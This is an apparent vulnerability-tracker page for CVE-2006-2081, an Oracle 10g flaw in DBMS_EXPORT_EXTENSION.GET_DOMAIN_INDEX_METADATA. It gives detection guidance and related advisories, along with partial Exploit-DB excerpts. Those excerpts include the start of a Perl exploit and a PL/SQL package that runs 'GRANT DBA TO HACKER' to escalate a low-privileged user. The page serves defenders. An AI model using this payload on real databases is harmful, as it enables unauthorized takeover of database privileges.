CVE-2006-2081
published 2006-04-27CVE-2006-2081: Oracle Database Server 10g Release 2 allows local users to execute arbitrary SQL queries via the GET_DOMAIN_INDEX_METADATA function in the…
PriorityP339medium4.6CVSS 2.0
AVLACLAuNCPIPAP
EXPLOIT
EPSS
21.56%
97.3th percentile
Oracle Database Server 10g Release 2 allows local users to execute arbitrary SQL queries via the GET_DOMAIN_INDEX_METADATA function in the DBMS_EXPORT_EXTENSION package. NOTE: this issue was originally linked to DB05 (CVE-2006-1870), but a reliable third party has claimed that it is not the same issue. Based on details of the problem, the primary issue appears to be insecure privileges that facilitate the introduction of SQL in a way that is not related to special characters, so this is not "SQL injection" per se.
Affected
5 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| oracle | database_server | — | — |
| oracle | database_server | — | — |
| oracle | database_server | — | — |
| oracle | database_server | — | — |
| oracle | database_server | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor Oracle DB audit logs for calls to SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA by non-privileged or unexpected users, especially when INDEX_SCHEMA or TYPE_SCHEMA reference user-controlled packages. ↗
- →Detect creation of Oracle packages with AUTHID CURRENT_USER that implement the ODCIIndexGetMetadata function — this is the exploit's mechanism for injecting privileged SQL execution. ↗
- →Alert on GRANT DBA statements executed via EXECUTE IMMEDIATE inside an autonomous transaction block, which is the privilege escalation payload used by this exploit. ↗
- →Flag Oracle sessions where a low-privileged user creates a package named MYBADPACKAGE or BUNKERPKG (or any package implementing ODCIIndexGetMetadata with autonomous_transaction) followed by a call to DBMS_EXPORT_EXTENSION. ↗
- →The Metasploit auxiliary module path modules/auxiliary/sqli/oracle/dbms_export_extension.rb can be used to test for this vulnerability; detect its characteristic SQL patterns in Oracle network traffic or audit logs. ↗
- ·The vulnerability affects Oracle 9i and 10g (including 10gR1 and 10gR2); exploitation requires a valid low-privileged database account — it is not remotely exploitable without credentials. ↗
- ·The root cause is insecure privileges on the DBMS_EXPORT_EXTENSION package rather than classic SQL injection via special characters; detection rules targeting SQL metacharacter injection will not catch this attack. ↗
- ·This CVE was originally linked to DB05 (CVE-2006-1870) but is confirmed to be a distinct issue; do not conflate detection signatures for the two vulnerabilities. ↗
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-7jg3-5w3h-9634: Unspecified vulnerability in Oracle Database Server 8
ghsa_unreviewed·2022-05-01·CVSS 4.6
CVE-2006-1870 [MEDIUM] GHSA-7jg3-5w3h-9634: Unspecified vulnerability in Oracle Database Server 8
Unspecified vulnerability in Oracle Database Server 8.1.7.4, 9.0.1.5, 9.2.0.7, 10.1.0.5, and 10.2.0.2 has unknown impact and attack vectors in the Export component, aka Vuln# DB05. NOTE: details are unavailable from Oracle, but as of 20060427, they have not publicly commented on whether DB05 is the same issue as CVE-2006-2081.
GHSA
GHSA-9f9f-mcqm-2v26: Multiple unspecified vulnerabilities in Oracle Database 8
ghsa_unreviewed·2022-05-01·CVSS 4.6
CVE-2006-3702 [MEDIUM] GHSA-9f9f-mcqm-2v26: Multiple unspecified vulnerabilities in Oracle Database 8
Multiple unspecified vulnerabilities in Oracle Database 8.1.7.4, 9.0.1.5, 9.2.0.7, 10.1.0.5, and 10.2.0.2 have unknown impact and attack vectors, aka Oracle Vuln# (1) DB06 in Export; (2) DB08, (3) DB09, (4) DB10, (5) DB11, (6) DB12, (7) DB13, (8) DB14, and (9) DBC01 for OCI; (10) DB16 for Query Rewrite/Summary Mgmt; (11) DB17, (12) DB18, (13) DB19, (14) DBC02, (15) DBC03, and (16) DBC04 for RPC; and (17) DB20 for Semantic Analysis. NOTE: as of 20060719, Oracle has not disputed third party claims that DB06 is related to "SQL injection" using DBMS_EXPORT_EXTENSION with a modified ODCIIndexGetMetadata routine and a call to GET_DOMAIN_INDEX_METADATA, in which case DB06 might be CVE-2006-2081.
GHSA
GHSA-3r8p-382h-8p7p: Oracle Database Server 10g Release 2 allows local users to execute arbitrary SQL queries via the GET_DOMAIN_INDEX_METADATA function in the DBMS_EXPORT
ghsa_unreviewed·2022-05-01·CVSS 9.0
CVE-2006-2081 [CRITICAL] GHSA-3r8p-382h-8p7p: Oracle Database Server 10g Release 2 allows local users to execute arbitrary SQL queries via the GET_DOMAIN_INDEX_METADATA function in the DBMS_EXPORT
Oracle Database Server 10g Release 2 allows local users to execute arbitrary SQL queries via the GET_DOMAIN_INDEX_METADATA function in the DBMS_EXPORT_EXTENSION package. NOTE: this issue was originally linked to DB05 (CVE-2006-1870), but a reliable third party has claimed that it is not the same issue. Based on details of the problem, the primary issue appears to be insecure privileges that facilitate the introduction of SQL in a way that is not related to special characters, so this is not "SQL injection" per se.
No detection rules found.
Exploit-DB
Oracle 9i/10g - DBMS_EXPORT_EXTENSION SQL Injection
exploitdb·2007-02-05
CVE-2006-2505 Oracle 9i/10g - DBMS_EXPORT_EXTENSION SQL Injection
Oracle 9i/10g - DBMS_EXPORT_EXTENSION SQL Injection
---
#!/usr/bin/perl
#
# Remote Oracle dbms_export_extension exploit (any version)
# Grant or revoke dba permission to unprivileged user
#
# Tested on Oracle 10g - Release 10.2.0.1.0
# Oracle 9i - Release 9.2.0.2.0
#
# REF: https://www.securityfocus.com/bid/17699
#
# AUTHOR: Andrea "bunker" Purificato
# http://rawlab.mindcreations.com
#
# DATE: Copyright 2007 - Sun Feb 4 15:53:04 CET 2007
#
# Oracle InstantClient (basic + sdk) required for DBD::Oracle
#
use warnings;
use strict;
use DBI;
use DBD::Oracle;
use Getopt::Std;
use vars qw/ %opt /;
sub usage {
print -s -u -p -g|-r
Options:
-h target server address
-s target sid name
-u user
-p password
-g|-r (g)rant dba to user | (r)evoke dba from user
USAGE
exit 0
}
my $opt_string = 'h:s:
Exploit-DB
Oracle 10g Release 2 - 'DBMS_EXPORT_EXTENSION' SQL
exploitdb·2006-04-26
CVE-2006-2505 Oracle 10g Release 2 - 'DBMS_EXPORT_EXTENSION' SQL
Oracle 10g Release 2 - 'DBMS_EXPORT_EXTENSION' SQL
---
/* 0day, description is wrong. /str0ke */
/*
* Fucking NON-0 day($) exploit for Oracle 10g 10.2.0.2.0
*
* Patch your database now!
*
* by N1V1Hd $3c41r3
*
*/
CREATE OR REPLACE
PACKAGE MYBADPACKAGE AUTHID CURRENT_USER
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER;
END;
/
CREATE OR REPLACE PACKAGE BODY MYBADPACKAGE
IS
FUNCTION ODCIIndexGetMetadata (oindexinfo SYS.odciindexinfo,P3
VARCHAR2,p4 VARCHAR2,env SYS.odcienv)
RETURN NUMBER
IS
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO HACKER';
COMMIT;
RETURN(1);
END;
END;
/
DECLARE
INDEX_NAME VARCHAR2(200);
INDEX_SCHEMA VARCHAR2(200);
TYPE_NAME VARCHAR2(200);
TYPE_SCHEMA VARCHAR2(200);
VERSION
Metasploit
Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION
metasploit
Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION
Oracle DB SQL Injection via DBMS_EXPORT_EXTENSION
This module will escalate an Oracle DB user to DBA by exploiting a sql injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package. Note: This module has been tested against 9i, 10gR1 and 10gR2.
No writeups or analysis indexed.
http://secunia.com/advisories/19860http://securityreason.com/securityalert/802http://securitytracker.com/id?1015999http://www.kb.cert.org/vuls/id/932124http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.htmlhttp://www.securityfocus.com/archive/1/431353/100/0/threadedhttp://www.securityfocus.com/archive/1/432078/100/0/threadedhttp://www.securityfocus.com/archive/1/432354/100/0/threadedhttp://www.securityfocus.com/archive/1/432355/100/0/threadedhttp://www.securityfocus.com/archive/1/432632/30/5250/threadedhttp://www.securityfocus.com/bid/17699https://exchange.xforce.ibmcloud.com/vulnerabilities/26048http://secunia.com/advisories/19860http://securityreason.com/securityalert/802http://securitytracker.com/id?1015999http://www.kb.cert.org/vuls/id/932124http://www.red-database-security.com/exploits/oracle-sql-injection-oracle-dbms_export_extension.htmlhttp://www.securityfocus.com/archive/1/431353/100/0/threadedhttp://www.securityfocus.com/archive/1/432078/100/0/threadedhttp://www.securityfocus.com/archive/1/432354/100/0/threadedhttp://www.securityfocus.com/archive/1/432355/100/0/threadedhttp://www.securityfocus.com/archive/1/432632/30/5250/threadedhttp://www.securityfocus.com/bid/17699https://exchange.xforce.ibmcloud.com/vulnerabilities/26048
2006-04-27
Published